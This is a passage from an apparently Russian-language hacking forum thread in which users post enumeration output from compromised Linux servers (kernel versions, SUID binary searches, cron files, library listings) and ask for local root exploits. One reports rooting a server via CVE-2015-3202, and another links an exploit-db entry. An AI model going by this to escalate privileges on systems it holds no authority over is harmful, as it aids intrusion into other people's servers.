01 * * * * root run-parts /etc/cron.hourly

cat /etc/cron.d/raid-check

Code:
# Run system wide raid-check once a week on Sunday at 1am by default
0 1 * * Sun root /usr/sbin/raid-check

cat /etc/cron.d/sysstat

Code:
# Run system activity accounting tool every 10 minutes
*/10 * * * * root /usr/lib64/sa/sa1 1 1
# 0 * * * * root /usr/lib64/sa/sa1 600 6 &
# Generate a daily summary of process accounting at 23:53
53 23 * * * root /usr/lib64/sa/sa2 -A

cat /proc/version

Code:
Linux version 2.6.32-431.29.2.el6.x86_64 (mockbuild@c6b9.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) ) #1 SMP Tue Sep 9 21:36:05 UTC 2014

cat /proc/sys/vm/mmap_min_addr

Code:
4096

ls -la /etc/cron.hourly

Code:
total 12
drwxr-xr-x. 2 root root 4096 Sep 26 2011 .
drwxr-xr-x. 71 root root 4096 Oct 8 04:27 ..
-rwxr-xr-x. 1 root root 409 Nov 23 2013 0anacron

cat /etc/cron.hourly/0anacron

Code:
#!/bin/bash
# Skip excecution unless the date has changed from the previous run
if test -r /var/spool/anacron/cron.daily; then
day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
exit 0;
fi

# Skip excecution unless AC powered
if test -x /usr/bin/on_ac_power; then
/usr/bin/on_ac_power &> /dev/null
if test $? -eq 1; then
exit 0
fi
fi
/usr/sbin/anacron -s

find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

Code:
-rwsr-xr-x. 1 root root 10272 Nov 22 2013 /sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root 34840 Nov 22 2013 /sbin/unix_chkpwd
-rwsr-xr-x. 1 root root 77336 Apr 28 2014 /bin/mount
-rwsr-xr-x. 1 root root 40760 Sep 26 2013 /bin/ping
-rwsr-x---. 1 root fuse 27968 Dec 7 2011 /bin/fusermount
-rwsr-xr-x. 1 root root 36488 Sep 26 2013 /bin/ping6
-rwsr-xr-x. 1 root root 53472 Apr 28 2014 /bin/umount
-rwsr-xr-x. 1 root root 34904 Jun 25 2014 /bin/su
-rwsr-x--- 1 root dbus 46232 Sep 13 2012 /lib64/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x. 1 root root 9000 Sep 3 2014 /usr/sbin/usernetctl
---s--x--x. 1 root root 123832 Nov 22 2013 /usr/bin/sudo
-rwsr-xr-x. 1 root root 71480 Dec 7 2011 /usr/bin/gpasswd
-rwsr-xr-x. 1 root root 51784 Nov 23 2013 /usr/bin/crontab
-rwsr-xr-x. 1 root root 30768 Feb 22 2012 /usr/bin/passwd
-rwsr-xr-x 1 root root 18072 Sep 19 2013 /usr/bin/pkexec
-rws--x--x. 1 root root 20056 Apr 28 2014 /usr/bin/chsh
-rwsr-xr-x. 1 root root 66352 Dec 7 2011 /usr/bin/chage
-rwsr-xr-x. 1 root root 36144 Dec 7 2011 /usr/bin/newgrp
-rws--x--x. 1 root root 20184 Apr 28 2014 /usr/bin/chfn
-rws--x--x. 1 root root 14280 Aug 29 2014 /usr/libexec/pt_chown
-rwsr-xr-x. 1 root root 237376 Nov 22 2013 /usr/libexec/openssh/ssh-keysign
-rwsr-xr-x 1 root root 11080 Sep 19 2013 /usr/libexec/polkit-1/polkit-agent-helper-1

Что с CVE-2015-3202 ?

Vip77

30.12.2015, 20:45

YaBtr said:
↑ (https://antichat.live/posts/3934113/)
Что с CVE-2015-3202 ?

Рутанул . Спасибо, с наступающим!

BestAV

04.04.2016, 14:02

Подскажите, что-то, под это дело:

Linux saturn 3.2.0-97-generic #137-Ubuntu SMP Thu Dec 17 18:11:47 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

ghost8

05.04.2016, 20:29

попробуй мож прокатит https://www.exploit-db.com/exploits/33589/

BestAV

06.04.2016, 16:42

Увы, но нет.

А сюда может есть какие-то мысли?

Linux 3.14.51-grsec #1 SMP Wed Aug 19 16:00:30 UTC 2015 x86_64

mariochat

09.04.2016, 18:21

Hello from Serbia!

Some people claim they've managed to root CentOS kernel 2.6.32-431.el6.x86_64 with FUSE exploit. I've tried on many 431 kernels they all give the same error :

bash: /bin/fusermount: Permission denied

Anyone ?

mybaks

13.04.2016, 17:10

Приветвую имеется проблема с повышением привелегий, шел залит, но считай только на просмотр файлов и некоторых файлов root.

Linux server 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64

Ищу кто может помочь в данном вопросе!

LETIFERUM

14.04.2016, 13:07

есть ли варианты?)

.SpoilerTarget" type="button">Spoiler
sh-4.2$ uname -a

uname -a

Linux 3.4.63-2.44-xen #1 SMP Wed Oct 2 11:18:32 UTC 2013 (d91a619) x8

6_64 x86_64 x86_64 GNU/Linux

sh-4.2$ ls -la /boot

ls -la /boot

total 22381

drwxr-xr-x 4 root root 1024 Apr 13 12:54 .

drwxr-xr-x 23 root root 4096 Apr 13 15:24 ..

-rw------- 1 root root 512 Mar 22 2012 backup_mbr

lrwxrwxrwx 1 root root 1 Apr 13 12:52 boot -> .

-rw-r--r-- 1 root root 1236 Jul 15 2012 boot.readme

-rw-r--r-- 1 root root 127359 Oct 3 2013 config-3.4.63-2.44-xen

drwxr-xr-x 2 root root 1024 Apr 13 12:54 grub

-rw-r--r-- 1 root root 10209218 Apr 13 12:56 initrd-3.4.63-2.44-xen

lrwxrwxrwx 1 root root 22 Apr 13 12:54 initrd-xen -> initrd-3.4.63-2.44-x

en

drwx------ 2 root root 12288 Mar 22 2012 lost+found

-rw-r--r-- 1 root root 581632 Apr 13 12:56 message

-rw-r--r-- 1 root root 218700 Oct 3 2013 symvers-3.4.63-2.44-xen.gz

-rw-r--r-- 1 root root 409 Oct 3 2013 sysctl.conf-3.4.63-2.44-xen

-rw-r--r-- 1 root root 2245738 Oct 3 2013 System.map-3.4.63-2.44-xen

-rw-r--r-- 1 root root 5087421 Oct 3 2013 vmlinux-3.4.63-2.44-xen.gz

-rw-r--r-- 1 root root 4324884 Oct 3 2013 vmlinuz-3.4.63-2.44-xen

lrwxrwxrwx 1 root root 23 Apr 13 12:54 vmlinuz-xen -> vmlinuz-3.4.63-2.44

-xen

sh-4.2$ ls -la --full-time /lib

ls -la --full-time /lib

total 7896

drwxr-xr-x 16 root root 4096 2016-04-13 12:51:46.645982937 +0400 .

drwxr-xr-x 23 root root 4096 2016-04-13 15:24:45.041884720 +0400 ..

drwxr-xr-x 2 root root 4096 2016-04-13 12:52:03.817982937 +0400 aaa_base

drwxr-xr-x 3 root root 4096 2016-04-13 12:54:51.596221936 +0400 cryptsetup

drwxr-xr-x 3 root root 4096 2016-04-13 12:52:18.301982937 +0400 dbus-1

drwxr-xr-x 2 root root 4096 2016-04-13 12:50:56.082563749 +0400 engines

drwxr-xr-x 5 root root 4096 2016-04-13 12:54:25.424797031 +0400 firmware

drwxr-xr-x 3 root root 4096 2016-04-13 12:50:51.862563749 +0400 i686

-rwxr-xr-x 1 root root 152418 2012-12-20 15:59:40.000000000 +0400 ld-2.15.so

lrwxrwxrwx 1 root root 10 2016-04-13 12:50:51.950563749 +0400 ld-linux.so.

2 -> ld-2.15.so

-rwxr-xr-x 1 root root 17585 2012-12-20 15:59:40.000000000 +0400 libanl-2.15.

so

lrwxrwxrwx 1 root root 14 2016-04-13 12:50:51.954563749 +0400 libanl.so.1

-> libanl-2.15.so

-rwxr-xr-x 1 root root 7176 2012-12-20 15:59:40.000000000 +0400 libBrokenLoc

ale-2.15.so

lrwxrwxrwx 1 root root 23 2016-04-13 12:50:51.954563749 +0400 libBrokenLoc

ale.so.1 -> libBrokenLocale-2.15.so

-rwxr-xr-x 1 root root 1920983 2012-12-20 15:59:40.000000000 +0400 libc-2.15.so

-rwxr-xr-x 1 root root 190899 2012-12-20 15:59:40.000000000 +0400 libcidn-2.15

.so

lrwxrwxrwx 1 root root 15 2016-04-13 12:50:51.982563749 +0400 libcidn.so.1

-> libcidn-2.15.so

lrwxrwxrwx 1 root root 24 2016-04-13 12:50:54.406563749 +0400 libcom_err.s

o.2 -> /usr/lib/libcom_err.so.2

lrwxrwxrwx 1 root root 26 2016-04-13 12:50:54.406563749 +0400 libcom_err.s

o.2.1 -> /usr/lib/libcom_err.so.2.1

-rwxr-xr-x 1 root root 61173 2012-12-20 15:59:40.000000000 +0400 libcrypt-2.1

5.so

-r-xr-xr-x 1 root root 1779936 2014-01-08 13:48:10.000000000 +0400 libcrypto.so

.1.0.0

lrwxrwxrwx 1 root root 16 2016-04-13 12:50:51.982563749 +0400 libcrypt.so.

1 -> libcrypt-2.15.so

lrwxrwxrwx 1 root root 12 2016-04-13 12:50:51.974563749 +0400 libc.so.6 ->

libc-2.15.so

-rwxr-xr-x 1 root root 17364 2012-12-20 15:59:40.000000000 +0400 libdl-2.15.s

o

lrwxrwxrwx 1 root root 13 2016-04-13 12:50:51.982563749 +0400 libdl.so.2 -

> libdl-2.15.so

-rwxr-xr-x 1 root root 116348 2011-10-29 18:53:08.000000000 +0400 libgcc_s.so.

1

lrwxrwxrwx 1 root root 18 2016-04-13 12:50:54.122563749 +0400 libkeyutils.

so.1 -> libkeyutils.so.1.4

-rwxr-xr-x 1 root root 13836 2012-07-15 08:02:45.000000000 +0400 libkeyutils.

so.1.4

-rwxr-xr-x 1 root root 201625 2012-12-20 15:59:40.000000000 +0400 libm-2.15.so

lrwxrwxrwx 1 root root 12 2016-04-13 12:50:51.994563749 +0400 libm.so.6 ->

libm-2.15.so

lrwxrwxrwx 1 root root 17 2016-04-13 12:50:54.022563749 +0400 libncurses.s

o.5 -> libncurses.so.5.9

-rwxr-xr-x 1 root root 153404 2012-08-04 11:21:16.000000000 +0400 libncurses.s

o.5.9

lrwxrwxrwx 1 root root 18 2016-04-13 12:50:54.026563749 +0400 libncursesw.

so.5 -> libncursesw.so.5.9

-rwxr-xr-x 1 root root 214928 2012-08-04 11:21:16.000000000 +0400 libncursesw.

so.5.9

-rwxr-xr-x 1 root root 103129 2012-12-20 15:59:40.000000000 +0400 libnsl-2.15.

so

lrwxrwxrwx 1 root root 14 2016-04-13 12:50:51.998563749 +0400 libnsl.so.1

-> libnsl-2.15.so

-rwxr-xr-x 1 root root 36121 2012-12-20 15:59:40.000000000 +0400 libnss_compa

t-2.15.so

lrwxrwxrwx 1 root root 21 2016-04-13 12:50:51.998563749 +0400 libnss_compa

t.so.2 -> libnss_compat-2.15.so

-rwxr-xr-x 1 root root 35316 2012-12-20 15:59:40.000000000 +0400 libnss_db-2.

15.so

lrwxrwxrwx 1 root root 17 2016-04-13 12:50:51.998563749 +0400 libnss_db.so

.2 -> libnss_db-2.15.so

-rwxr-xr-x 1 root root 25555 2012-12-20 15:59:40.000000000 +0400 libnss_dns-2

.15.so

lrwxrwxrwx 1 root root 18 2016-04-13 12:50:51.998563749 +0400 libnss_dns.s

o.2 -> libnss_dns-2.15.so

-rwxr-xr-x 1 root root 59240 2012-12-20 15:59:40.000000000 +0400 libnss_files

-2.15.so

lrwxrwxrwx 1 root root 20 2016-04-13 12:50:52.002563749 +0400 libnss_files

.so.2 -> libnss_files-2.15.so

-rwxr-xr-x 1 root root 21937 2012-12-20 15:59:40.000000000 +0400 libnss_hesio

d-2.15.so

lrwxrwxrwx 1 root root 21 2016-04-13 12:50:52.026563749 +0400 libnss_hesio

d.so.2 -> libnss_hesiod-2.15.so

-rwxr-xr-x 1 root root 88320 2012-07-16 02:07:52.000000000 +0400 libnss_ldap.

so.2

-rwxr-xr-x 1 root root 49852 2012-12-20 15:59:40.000000000 +0400 libnss_nis-2

.15.so

-rwxr-xr-x 1 root root 58621 2012-12-20 15:59:40.000000000 +0400 libnss_nispl

us-2.15.so

lrwxrwxrwx 1 root root 22 2016-04-13 12:50:52.030563749 +0400 libnss_nispl

us.so.2 -> libnss_nisplus-2.15.so

lrwxrwxrwx 1 root root 18 2016-04-13 12:50:52.026563749 +0400 libnss_nis.s

o.2 -> libnss_nis-2.15.so

-rwxr-xr-x 1 root root 1533916 2013-11-12 13:16:05.000000000 +0400 libnss_wins.

so.2

-rwxr-xr-x 1 root root 124731 2012-12-20 15:59:40.000000000 +0400 libpthread-2

.15.so

lrwxrwxrwx 1 root root 18 2016-04-13 12:50:52.030563749 +0400 libpthread.s

o.0 -> libpthread-2.15.so

-rwxr-xr-x 1 root root 94458 2012-12-20 15:59:40.000000000 +0400 libresolv-2.

15.so

lrwxrwxrwx 1 root root 17 2016-04-13 12:50:52.034563749 +0400 libresolv.so

.2 -> libresolv-2.15.so

-rwxr-xr-x 1 root root 38955 2012-12-20 15:59:40.000000000 +0400 librt-2.15.s

o

lrwxrwxrwx 1 root root 13 2016-04-13 12:50:52.034563749 +0400 librt.so.1 -

> librt-2.15.so

-rwxr-xr-x 1 root root 16226 2012-12-20 15:59:40.000000000 +0400 libSegFault.

so

-rwxr-xr-x 1 root root 116784 2012-07-16 12:50:58.000000000 +0400 libselinux.s

o.1

-r-xr-xr-x 1 root root 403600 2014-01-08 13:48:10.000000000 +0400 libssl.so.1.

0.0

lrwxrwxrwx 1 root root 19 2016-04-13 12:50:54.406563749 +0400 libss.so.2 -

> /usr/lib/libss.so.2

lrwxrwxrwx 1 root root 21 2016-04-13 12:50:54.406563749 +0400 libss.so.2.0

-> /usr/lib/libss.so.2.0

-rwxr-xr-x 1 root root 34643 2012-12-20 15:59:40.000000000 +0400 libthread_db

-1.0.so

lrwxrwxrwx 1 root root 19 2016-04-13 12:50:52.038563749 +0400 libthread_db

.so.1 -> libthread_db-1.0.so

lrwxrwxrwx 1 root root 15 2016-04-13 12:50:54.034563749 +0400 libtinfo.so.

5 -> libtinfo.so.5.9

-rwxr-xr-x 1 root root 156536 2012-08-04 11:21:16.000000000 +0400 libtinfo.so.

5.9

-rwxr-xr-x 1 root root 12614 2012-12-20 15:59:40.000000000 +0400 libutil-2.15

.so

lrwxrwxrwx 1 root root 15 2016-04-13 12:50:52.038563749 +0400 libutil.so.1

-> libutil-2.15.so

lrwxrwxrwx 1 root root 13 2016-04-13 12:50:53.862563749 +0400 libz.so.1 ->

libz.so.1.2.7

-rwxr-xr-x 1 root root 87544 2012-07-15 03:28:10.000000000 +0400 libz.so.1.2.

7

drwxr-xr-x 2 root root 4096 2016-04-13 12:51:21.886563749 +0400 lsb

drwxr-xr-x 7 root root 4096 2013-05-28 16:02:34.000000000 +0400 mkinitrd

drwxr-xr-x 3 root root 4096 2016-04-13 12:54:25.344797032 +0400 modules

drwxr-xr-x 2 root root 4096 2016-04-13 12:51:40.289982937 +0400 sysctl.d

drwxr-xr-x 7 root root 4096 2012-10-05 14:40:18.000000000 +0400 systemd

drwxr-xr-x 2 root root 4096 2016-04-13 12:51:44.557982937 +0400 sysvinit

drwxr-xr-x 5 root root 4096 2016-04-13 12:54:50.076221936 +0400 udev

drwxr-xr-x 2 root root 4096 2016-04-13 12:52:03.805982937 +0400 YaST

sh-4.2$ mount

mount

devtmpfs on /dev type devtmpfs (rw,relatime,size=1189340k,nr_inodes=297335,mode=

755)

tmpfs on /dev/shm type tmpfs (rw,relatime)

tmpfs on /run type tmpfs (rw,nosuid,nodev,relatime,mode=755)

devpts on /dev/pts type devpts (rw,relatime,gid=5,mode=620,ptmxmode=000)

/dev/mapper/vm8581_system-root on / type ext4 (rw,relatime,nobarrier,errors=pani

c,data=ordered)

proc on /proc type proc (rw,relatime)

sysfs on /sys type sysfs (rw,relatime)

tmpfs on /sys/fs/cgroup type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)

cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,re

lease_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)

cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpu

set)

cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatim

e,cpuacct,cpu)

cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,mem

ory)

cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,de

vices)

cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,fr

eezer)

cgroup on /sys/fs/cgroup/net_cls type cgroup (rw,nosuid,nodev,noexec,relatime,ne

t_cls)

cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blki

o)

cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime

,perf_event)

systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=26,pgrp=1,time

out=300,minproto=5,maxproto=5,direct)

tmpfs on /var/lock type tmpfs (rw,nosuid,nodev,relatime,mode=755)

securityfs on /sys/kernel/security type securityfs (rw,relatime)

tmpfs on /media type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)

tmpfs on /var/run type tmpfs (rw,nosuid,nodev,relatime,mode=755)

debugfs on /sys/kernel/debug type debugfs (rw,relatime)

mqueue on /dev/mqueue type mqueue (rw,relatime)

/dev/xvda1 on /boot type ext3 (rw,relatime,errors=panic,barrier=0,data=ordered)

binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)

sh-4.2$ df -h

df -h

Filesystem Size Used Avail Use% Mounted on

rootfs 146G 135G 3.7G 98% /

devtmpfs 1.2G 36K 1.2G 1% /dev

tmpfs 1.3G 0 1.3G 0% /dev/shm

tmpfs 1.3G 104K 1.3G 1% /run

/dev/mapper/vm8581_system-root 146G 135G 3.7G 98% /

tmpfs 1.3G 0 1.3G 0% /sys/fs/cgroup

tmpfs 1.3G 104K 1.3G 1% /var/lock

tmpfs 1.3G 0 1.3G 0% /media

tmpfs 1.3G 104K 1.3G 1% /var/run

/dev/xvda1 152M 28M 116M 20% /boot

sh-4.2$ cat /etc/issue

cat /etc/issue

Welcome to openSUSE 12.2 "Mantis" - Kernel \r (\l).

sh-4.2$ cat /etc/crontab

cat /etc/crontab

SHELL=/bin/sh

PATH=/usr/bin:/usr/sbin:/sbin:/bin:/usr/lib/news/bin

MAILTO=root

#

# check scripts in cron.hourly, cron.daily, cron.weekly, and cron.monthly

#

-*/15 * * * * root test -x /usr/lib/cron/run-crons && /usr/lib/cron/run-crons

>/dev/null 2>&1

sh-4.2$ cat /proc/version

cat /proc/version

Linux version 3.4.63-2.44-xen (geeko@buildhost) (gcc version 4.7.1 20120723 [gcc

-4_7-branch revision 189773] (SUSE Linux) ) #1 SMP Wed Oct 2 11:18:32 UTC 2013 (

d91a619)

powerOfthemind

20.04.2016, 13:58

Linux XXXXXXX 2.6.18-406.el5.028stab119.3 #1 SMP Tue Sep 15 16:46:46 MSD 2015 x86_64 x86_64 x86_64 GNU/Linux

Подскажите сплоит, в этой теме новичок.Буду пробовать 1й раз.

semik

25.04.2016, 10:37

Подскажите варианты:

$ uname -a

Linux *** 2.6.32-573.12.1.el6.x86_64 #1 SMP Tue Dec 15 21:19:08 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

$ ls -la /boot

total 170848

dr-xr-xr-x. 5 root root 4096 Mar 18 19:55 .

dr-xr-xr-x. 25 root root 4096 Apr 24 21:43 ..

-rw-r--r--. 1 root root 107139 Dec 15 13:48 config-2.6.32-573.12.1.el6.x86_64

-rw-r--r--. 1 root root 107139 Feb 9 15:15 config-2.6.32-573.18.1.el6.x86_64

-rw-r--r--. 1 root root 107138 Aug 13 2015 config-2.6.32-573.3.1.el6.x86_64

-rw-r--r--. 1 root root 107138 Sep 22 2015 config-2.6.32-573.7.1.el6.x86_64

-rw-r--r--. 1 root root 107138 Nov 10 10:31 config-2.6.32-573.8.1.el6.x86_64

drwxr-xr-x. 3 root root 4096 Dec 27 2014 efi

drwxr-xr-x. 2 root root 4096 Mar 18 19:55 grub

-rw-------. 1 root root 24858048 Dec 25 12:50 initramfs-2.6.32-573.12.1.el6.x86_64.img

-rw-------. 1 root root 24860506 Mar 18 19:55 initramfs-2.6.32-573.18.1.el6.x86_64.img

-rw-------. 1 root root 24833443 Aug 22 2015 initramfs-2.6.32-573.3.1.el6.x86_64.img

-rw-------. 1 root root 24848591 Oct 18 2015 initramfs-2.6.32-573.7.1.el6.x86_64.img

-rw-------. 1 root root 24843684 Dec 12 10:49 initramfs-2.6.32-573.8.1.el6.x86_64.img

-rw-------. 1 root root 4909993 Feb 29 13:37 initrd-2.6.32-573.12.1.el6.x86_64kdump.img

-rw-------. 1 root root 4918404 Aug 23 2015 initrd-2.6.32-573.3.1.el6.x86_64kdump.img

-rw-------. 1 root root 4886463 Nov 29 01:56 initrd-2.6.32-573.7.1.el6.x86_64kdump.img

drwx------. 2 root root 16384 Dec 27 2014 lost+found

-rw-r--r--. 1 root root 206008 Dec 15 13:49 symvers-2.6.32-573.12.1.el6.x86_64.gz

-rw-r--r--. 1 root root 206010 Feb 9 15:16 symvers-2.6.32-573.18.1.el6.x86_64.gz

-rw-r--r--. 1 root root 205998 Aug 13 2015 symvers-2.6.32-573.3.1.el6.x86_64.gz

-rw-r--r--. 1 root root 205998 Sep 22 2015 symvers-2.6.32-573.7.1.el6.x86_64.gz

-rw-r--r--. 1 root root 205991 Nov 10 10:32 symvers-2.6.32-573.8.1.el6.x86_64.gz

-rw-r--r--. 1 root root 2585672 Dec 15 13:48 System.map-2.6.32-573.12.1.el6.x86_64

-rw-r--r--. 1 root root 2586114 Feb 9 15:15 System.map-2.6.32-573.18.1.el6.x86_64

-rw-r--r--. 1 root root 2585088 Aug 13 2015 System.map-2.6.32-573.3.1.el6.x86_64

-rw-r--r--. 1 root root 2585416 Sep 22 2015 System.map-2.6.32-573.7.1.el6.x86_64

-rw-r--r--. 1 root root 2585424 Nov 10 10:31 System.map-2.6.32-573.8.1.el6.x86_64

-rwxr-xr-x. 1 root root 4221232 Dec 15 13:48 vmlinuz-2.6.32-573.12.1.el6.x86_64

-rw-r--r--. 1 root root 171 Dec 15 13:48 .vmlinuz-2.6.32-573.12.1.el6.x86_64.hmac

-rwxr-xr-x. 1 root root 4221968 Feb 9 15:15 vmlinuz-2.6.32-573.18.1.el6.x86_64

-rw-r--r--. 1 root root 171 Feb 9 15:15 .vmlinuz-2.6.32-573.18.1.el6.x86_64.hmac

-rwxr-xr-x. 1 root root 4221776 Aug 13 2015 vmlinuz-2.6.32-573.3.1.el6.x86_64

-rw-r--r--. 1 root root 170 Aug 13 2015 .vmlinuz-2.6.32-573.3.1.el6.x86_64.hmac

-rwxr-xr-x. 1 root root 4220144 Sep 22 2015 vmlinuz-2.6.32-573.7.1.el6.x86_64

-rw-r--r--. 1 root root 170 Sep 22 2015 .vmlinuz-2.6.32-573.7.1.el6.x86_64.hmac

-rwxr-xr-x. 1 root root 4220368 Nov 10 10:31 vmlinuz-2.6.32-573.8.1.el6.x86_64

-rw-r--r--. 1 root root 170 Nov 10 10:31 .vmlinuz-2.6.32-573.8.1.el6.x86_64.hma

$ ls -la --full-time /lib64

total 24836

dr-xr-xr-x. 11 root root 12288 2016-03-19 03:15:39.407798605 -0700 .

dr-xr-xr-x. 25 root root 4096 2016-04-24 21:43:01.567027756 -0700 ..

drwxr-xr-x. 2 root root 4096 2016-03-01 03:15:54.531834095 -0800 dbus-1

drwxr-xr-x. 2 root root 4096 2015-12-25 12:47:27.124053456 -0800 device-mapper

-rwxr-xr-x. 1 root root 157072 2016-02-16 10:37:59.000000000 -0800 ld-2.12.so

lrwxrwxrwx. 1 root root 10 2016-02-29 13:36:01.664970844 -0800 ld-linux-x86-64.so.2 -> ld-2.12.so

lrwxrwxrwx. 1 root root 15 2014-12-27 14:20:24.299000140 -0800 libacl.so.1 -> libacl.so.1.1.0

-rwxr-xr-x. 1 root root 33816 2011-12-07 08:53:53.000000000 -0800 libacl.so.1.1.0

lrwxrwxrwx. 1 root root 22 2014-12-27 14:20:43.920000141 -0800 libaio.so.1 -> /lib64/libaio.so.1.0.1

-rwxr-xr-x. 1 root root 3944 2010-08-22 14:08:18.000000000 -0700 libaio.so.1.0.0

-rwxr-xr-x. 1 root root 5624 2010-08-22 14:08:18.000000000 -0700 libaio.so.1.0.1

-rwxr-xr-x. 1 root root 19368 2016-02-16 10:38:00.000000000 -0800 libanl-2.12.so

lrwxrwxrwx. 1 root root 14 2016-02-29 13:36:01.682970512 -0800 libanl.so.1 -> libanl-2.12.so

lrwxrwxrwx. 1 root root 18 2014-12-27 14:20:59.514000140 -0800 libasound.so.2 -> libasound.so.2.0.0

-rwxr-xr-x. 1 root root 963768 2011-12-07 10:22:39.000000000 -0800 libasound.so.2.0.0

lrwxrwxrwx. 1 root root 16 2014-12-27 14:20:22.627000141 -0800 libattr.so.1 -> libattr.so.1.1.0

-rwxr-xr-x. 1 root root 21152 2011-09-23 11:53:58.000000000 -0700 libattr.so.1.1.0

lrwxrwxrwx. 1 root root 17 2014-12-27 14:27:11.147000140 -0800 libaudit.so.1 -> libaudit.so.1.0.0

-rwxr-xr-x. 1 root root 144208 2014-10-15 05:54:13.000000000 -0700 libaudit.so.1.0.0

lrwxrwxrwx. 1 root root 19 2014-12-27 14:27:11.154000140 -0800 libauparse.so.0 -> libauparse.so.0.0.0

-rwxr-xr-x. 1 root root 87024 2014-10-15 05:54:13.000000000 -0700 libauparse.so.0.0.0

lrwxrwxrwx. 1 root root 17 2014-12-27 14:27:11.658000141 -0800 libblkid.so.1 -> libblkid.so.1.1.0

-rwxr-xr-x. 1 root root 138616 2014-10-15 03:38:28.000000000 -0700 libblkid.so.1.1.0

-rwxr-xr-x. 1 root root 8488 2016-02-16 10:38:00.000000000 -0800 libBrokenLocale-2.12.so

lrwxrwxrwx. 1 root root 23 2016-02-29 13:36:01.678970584 -0800 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so

lrwxrwxrwx. 1 root root 15 2014-12-27 14:20:24.275000141 -0800 libbz2.so.1 -> libbz2.so.1.0.4

-rwxr-xr-x. 1 root root 69976 2011-06-24 18:45:55.000000000 -0700 libbz2.so.1.0.4

-rwxr-xr-x. 1 root root 1926520 2016-02-16 10:38:01.000000000 -0800 libc-2.12.so

lrwxrwxrwx. 1 root root 18 2014-12-27 14:20:29.251000141 -0800 libcap-ng.so.0 -> libcap-ng.so.0.0.0

-rwxr-xr-x. 1 root root 18672 2011-06-24 20:49:32.000000000 -0700 libcap-ng.so.0.0.0

lrwxrwxrwx. 1 root root 14 2014-12-27 14:20:22.642000141 -0800 libcap.so.2 -> libcap.so.2.16

-rwxr-xr-x. 1 root root 19016 2011-12-07 12:04:01.000000000 -0800 libcap.so.2.16

lrwxrwxrwx. 1 root root 19 2015-08-22 10:46:43.303032430 -0700 libcgroup.so.1 -> libcgroup.so.1.0.40

-rwxr-xr-x. 1 root root 103096 2015-07-23 11:08:39.000000000 -0700 libcgroup.so.1.0.40

-rwxr-xr-x. 1 root root 197064 2016-02-16 10:37:59.000000000 -0800 libcidn-2.12.so

lrwxrwxrwx. 1 root root 15 2016-02-29 13:36:01.846967484 -0800 libcidn.so.1 -> libcidn-2.12.so

lrwxrwxrwx. 1 root root 17 2015-08-22 10:44:57.894714977 -0700 libcom_err.so.2 -> libcom_err.so.2.1

-rwxr-xr-x. 1 root root 17256 2015-07-24 03:33:24.000000000 -0700 libcom_err.so.2.1

-rwxr-xr-x. 1 root root 43392 2016-02-16 10:37:59.000000000 -0800 libcrypt-2.12.so

lrwxrwxrwx. 1 root root 22 2014-12-27 14:27:30.294000140 -0800 libcryptsetup.so.1 -> libcryptsetup.so.1.1.0

-rwxr-xr-x. 1 root root 97536 2014-10-15 04:50:42.000000000 -0700 libcryptsetup.so.1.1.0

-rw-r--r--. 1 root root 65 2014-10-15 04:50:43.000000000 -0700 .libcryptsetup.so.1.1.0.hmac

-rw-r--r--. 1 root root 65 2014-10-15 04:50:43.000000000 -0700 .libcryptsetup.so.1.hmac

lrwxrwxrwx. 1 root root 16 2016-02-29 13:36:01.850967411 -0800 libcrypt.so.1 -> libcrypt-2.12.so

lrwxrwxrwx. 1 root root 12 2016-02-29 13:36:01.827967835 -0800 libc.so.6 -> libc-2.12.so

-rwxr-xr-x. 1 root root 976976 2010-11-10 19:07:19.000000000 -0800 libdb-4.2.so

-rwxr-xr-x. 1 root root 1043696 2010-11-10 19:07:19.000000000 -0800 libdb-4.3.so

-rwxr-xr-x. 1 root root 1525480 2015-09-22 08:18:59.000000000 -0700 libdb-4.7.so

-rwxr-xr-x. 1 root root 1055928 2010-11-10 19:07:19.000000000 -0800 libdb_cxx-4.2.so

-rwxr-xr-x. 1 root root 1139224 2010-11-10 19:07:19.000000000 -0800 libdb_cxx-4.3.so

lrwxrwxrwx. 1 root root 18 2015-05-25 13:25:45.618349293 -0700 libdbus-1.so.3 -> libdbus-1.so.3.4.0

-rwxr-xr-x. 1 root root 268232 2015-04-22 03:52:25.000000000 -0700 libdbus-1.so.3.4.0

lrwxrwxrwx. 1 root root 46 2015-12-25 12:47:27.126053420 -0800 libdevmapper-event-lvm2mirror.so -> device-mapper/libdevmapper-event-lvm2mirror.so

lrwxrwxrwx. 1 root root 44 2015-12-25 12:47:27.127053402 -0800 libdevmapper-event-lvm2raid.so -> device-mapper/libdevmapper-event-lvm2raid.so

lrwxrwxrwx. 1 root root 48 2015-12-25 12:47:27.129053365 -0800 libdevmapper-event-lvm2snapshot.so -> device-mapper/libdevmapper-event-lvm2snapshot.so

-rwxr-xr-x. 1 root root 10328 2015-12-15 06:49:46.000000000 -0800 libdevmapper-event-lvm2.so.2.02

lrwxrwxrwx. 1 root root 44 2015-12-25 12:47:27.131053328 -0800 libdevmapper-event-lvm2thin.so -> device-mapper/libdevmapper-event-lvm2thin.so

